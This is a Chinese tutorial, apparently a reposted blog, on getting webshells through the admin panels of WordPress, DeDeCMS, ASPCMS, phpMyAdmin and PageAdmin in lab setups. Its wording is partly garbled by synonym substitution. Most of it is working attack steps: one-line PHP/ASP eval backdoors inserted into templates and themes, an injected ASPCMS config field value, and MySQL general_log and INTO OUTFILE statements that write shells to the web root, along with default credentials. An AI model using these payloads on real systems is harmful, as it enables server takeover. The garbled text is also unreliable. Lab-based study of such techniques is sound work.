常见CMS弊端(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
目次一:WordPress
步调一:进入Vulhub靶场并实验以下命令开启靶场;在欣赏器中访问并安装好子...
步调二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登岸WP后点击【外貌】--》【编辑】 --》 404.php
步调三:访问以下毗连即可获取WebShel...
姿势二:上传主题拿WebShell
步调一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外貌】 --》【主题】 --》【添加】--》【上传主题】--》【欣赏】--》【现在安装】
步调二:安装乐成后访问主题下的网站后门文件..
二:DeDeCMS
姿势一:通过文件管理器上传WebShell
步调一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
步调二:登岸到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
码上传...OK
步调三:访问上传乐成后的文件并使用蚁剑毗连测试...
姿势二:修改模板文件拿WebShel
步调一:与WPCMS雷同,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下
步调二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变革...
步调三:使用蚁剑进行毗连测试.
姿势三:后台任意命令实验拿WebShell
步调一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步调二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
步调三:使用蚁剑毗连测试...
三:ASPCMS
姿势一:后台修改设置文件拿Shell
步调一:访问以下地点为ASPCMS.并登岸到后台(这里注意在搭建站点的时候注意权限问题)
步调二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启署理进行抓包
步调三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包检察被修改的asp文件内容...
步调四:访问以下地点进行毗连...
四、PHPMyadmin
姿势⼀:通过⽇志⽂件拿Shell
姿势⼆:导⼊导出拿WebShell
1.起首判断mysql位置
2.推测web路径
3.写webshell
4.欣赏器
姿势三:界面图像化GetShell
五、Pageadmin
步调一:准备一个一句话木马的asp文件,然后压缩成zip格式。
步调二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】
步调三:解压文件。
步调四:使用工具毗连。
一:WordPress
步调一:进入Vulhub靶场并实验以下命令开启靶场;在欣赏器中访问并安装好子...
#实验命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d #靶园地点
http://192.168.4.176:8080/wp-admin/ https://i-blog.csdnimg.cn/direct/208f06ff7d1d4b9e992230fc5f6b822e.png
步调二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登岸WP后点击【外貌】--》【编辑】 --》 404.php
在其404模板中插入一句话木马代码.点击【更新文件】按钮
<?php eval($ POST['cmd']);?>
https://i-blog.csdnimg.cn/direct/93e76f56eda5473f973df077c4a68415.png
步调三:访问以下毗连即可获取WebShel...
#拼接路径
/wp-content/themes/twentyfifteen/404.php #访问毗连
http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php
菜刀毗连:
https://i-blog.csdnimg.cn/direct/5d38d607fa32496f8fa8786b44fd027e.png
姿势二:上传主题拿WebShell
步调一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外貌】 --》【主题】 --》【添加】--》【上传主题】--》【欣赏】--》【现在安装】
主题文件
https://i-blog.csdnimg.cn/direct/1add790a38394c57b5c8f44354ae9237.png
https://i-blog.csdnimg.cn/direct/7e1aa788c40d4fba93404ebdf4884a91.png
https://i-blog.csdnimg.cn/direct/4a76afca55a94a2b99e57170e9f1ca71.png
步调二:安装乐成后访问主题下的网站后门文件..
#拼接路径
/wp-content/themes/ Farallon-develop-v0.3.8/shell.php #访问地点
http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php #蚁剑毗连
https://i-blog.csdnimg.cn/direct/e5881b7b43194461ae9debe8e55196b7.png
二:DeDeCMS
弊端复现
姿势一:通过文件管理器上传WebShell
步调一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
#前台
http://192.168.4.139/dedecms/index.php?upcache=1
http://192.168.4.139/dedecms/index.php?upcache=1 http://192.168.4.139/dedecms/index.php?upcache=1
#后台
http://192.168.4.139/dedecms/dede/
http://192.168.4.139/dedecms/dede/ http://192.168.4.139/dedecms/dede/
#信息
username:admin
password:admin
https://i-blog.csdnimg.cn/direct/93c28bff3a4a4b5088fd63f9dff5b6f8.png
步调二:登岸到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
码上传...OK
https://i-blog.csdnimg.cn/direct/c460f548046248d488ecc3f1668e55e9.png
步调三:访问上传乐成后的文件并使用蚁剑毗连测试...
#文件地点
http://127.0.0.1/uploads/uploads/shell.php
http://127.0.0.1/uploads/uploads/shell.php http://127.0.0.1/uploads/uploads/shell.php
https://i-blog.csdnimg.cn/direct/fbe58cd202c64ddbb2c91eee5bdd818a.png
姿势二:修改模板文件拿WebShel
步调一:与WPCMS雷同,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下
https://i-blog.csdnimg.cn/direct/3cf5c252a95d48208ce4cb92cce020b5.png
https://i-blog.csdnimg.cn/direct/3fcd34ca884043c1a488ebf32bb9f7a1.png
步调二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变革...
https://i-blog.csdnimg.cn/direct/8f768b23dd9946e4b9f40a8b30bdbb62.png
https://i-blog.csdnimg.cn/direct/64ea7dc47cf9429bb0d4fe19951237b8.png
步调三:使用蚁剑进行毗连测试.
#地点
http://127.0.0.1/uploads/index.php
http://127.0.0.1/uploads/index.php http://127.0.0.1/uploads/index.php
https://i-blog.csdnimg.cn/direct/0b63659934644645a28a44c8da308c17.png
姿势三:后台任意命令实验拿WebShell
步调一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
https://i-blog.csdnimg.cn/direct/d86a8b7f44254f909277173d9db35c69.png
步调二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
http://127.0.0.1/dedecms/plus/ad js.php?aid=1 https://i-blog.csdnimg.cn/direct/7b1506d8fc69405891c5d071a151e443.png
步调三:使用蚁剑毗连测试...
https://i-blog.csdnimg.cn/direct/5bd6ffaceff34eb3b7f3691d78a82190.png
三:ASPCMS
ASPCMS是由上谷网络开辟的全新内核的开源企业建站体系,可以或许胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,可以或许在短时间内完成企业建站。
弊端复现
姿势一:后台修改设置文件拿Shell
步调一:访问以下地点为ASPCMS.并登岸到后台(这里注意在搭建站点的时候注意权限问题)
#网站后台
http://192.168.4.139/admin_aspcms/login.asp //全功能版本 #账户暗码
username:admin
password:123456
https://i-blog.csdnimg.cn/direct/62ee2c00e64f4783b73565330ded5852.png
步调二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启署理进行抓包
https://i-blog.csdnimg.cn/direct/7e0c54587e4a41b39d59d6929c3b5396.png
步调三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包检察被修改的asp文件内容...
#字段值
1%25><%25Eval(Request(chr(65)))%25><%25 #密码是a #影响文件
/config/AspCms _Config.asp
https://i-blog.csdnimg.cn/direct/3b0fb7ff299c473e9bb6c4b33aa3ff9a.png
步调四:访问以下地点进行毗连...
http://192.168.207.130:81/config//AspCms_Config.asp
https://i-blog.csdnimg.cn/direct/b23dd21b671c423fbb9045014eda7c1c.png
四、PHPMyadmin
姿势⼀:通过⽇志⽂件拿Shell
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。
show global variables like '%general%'; https://i-blog.csdnimg.cn/direct/ddca8c31ddfa4c748e9594408340a435.png
set global general_log='on';
set global general_log_file = 'E:/phpstudy_pro/WWW/mafa.php' https://i-blog.csdnimg.cn/direct/33f0a8dcfa09431fa68a05847eb7480e.png
select '<?php phpinfo();?>'; https://i-blog.csdnimg.cn/direct/d5e02ee048c34c9092d2ddb77b92bf4e.png
php代码实验乐成!
https://i-blog.csdnimg.cn/direct/d3016d75742b437b8ff2de31b4f33114.png
姿势⼆:导⼊导出拿WebShell
思路:通过SQL语句拿webshell ⽤into outfile把后⻔写到⽹站⽬录上。
1.起首判断mysql位置
select @@datadir 路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\
https://i-blog.csdnimg.cn/direct/8ae799f974084e20b5989508fac5ba82.png
2.推测web路径
推测web路径: E:\phpstudy_pro\WWW
E:\phpstudy\WWW\web.php
3.写webshell
select "<?php phpinfo(); eval($_POST);?>" into outfile 'E:/phpstudy_pro/WWW/a.php ';
select "<?php phpinfo(); system($_GET);?>" into outfile 'E:/phpstudy_pro/WWW/b.php'; https://i-blog.csdnimg.cn/direct/4cd1a349a8e94b959e5b3f5c0628f327.png
4.欣赏器
http://127.0.0.1/b.php?a=dir ..\
备注:/
不要用\,如里要用\\(转义)
https://i-blog.csdnimg.cn/direct/d094a93f370e453386d8924d0ba2d19b.png
姿势三:界面图像化GetShell
假如过滤了 into outfile 第一种的图形化操作..
phpmyadmin管理台
变量:日记 搜索:gen
log:on
file: E:/phpstudy_pro/WWW/mafa.php
https://i-blog.csdnimg.cn/direct/c109c91c8a374e74800a9cc110730b95.png
sql:
select “<?php eval($_POST[‘cmd’]);?>”; https://i-blog.csdnimg.cn/direct/884e5a84f7534b61b39b7d0c5cea4f20.png
https://i-blog.csdnimg.cn/direct/8b526f82081546f597f5af5f5fee5b73.png
五、Pageadmin
PageAdmin CMS体系是基于.Net的⽹站管理体系,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理体系解决⽅案。
源码⽂件+MSSQL(SA/Rsec123456)
登录到管理员后台
https://i-blog.csdnimg.cn/direct/d5e31b78d23a469bbdbea089c400222f.png
步调一:准备一个一句话木马的asp文件,然后压缩成zip格式。
https://i-blog.csdnimg.cn/direct/15e0a8b2a4904797b698e64a9964c864.png
https://i-blog.csdnimg.cn/direct/df630895d774494ebe7ec23990aaaee4.png
步调二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】
https://i-blog.csdnimg.cn/direct/bad2add1bec446c3a8777e9e86471067.png
步调三:解压文件。
https://i-blog.csdnimg.cn/direct/72f8a00048f8403985d6ebd22327fd11.png
步调四:使用工具毗连。
https://i-blog.csdnimg.cn/direct/833d3931482e4a569aaad9bb2e12ec62.pnghttps://i-blog.csdnimg.cn/direct/b7dfec283505415e9eb7753cea3c1e0b.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]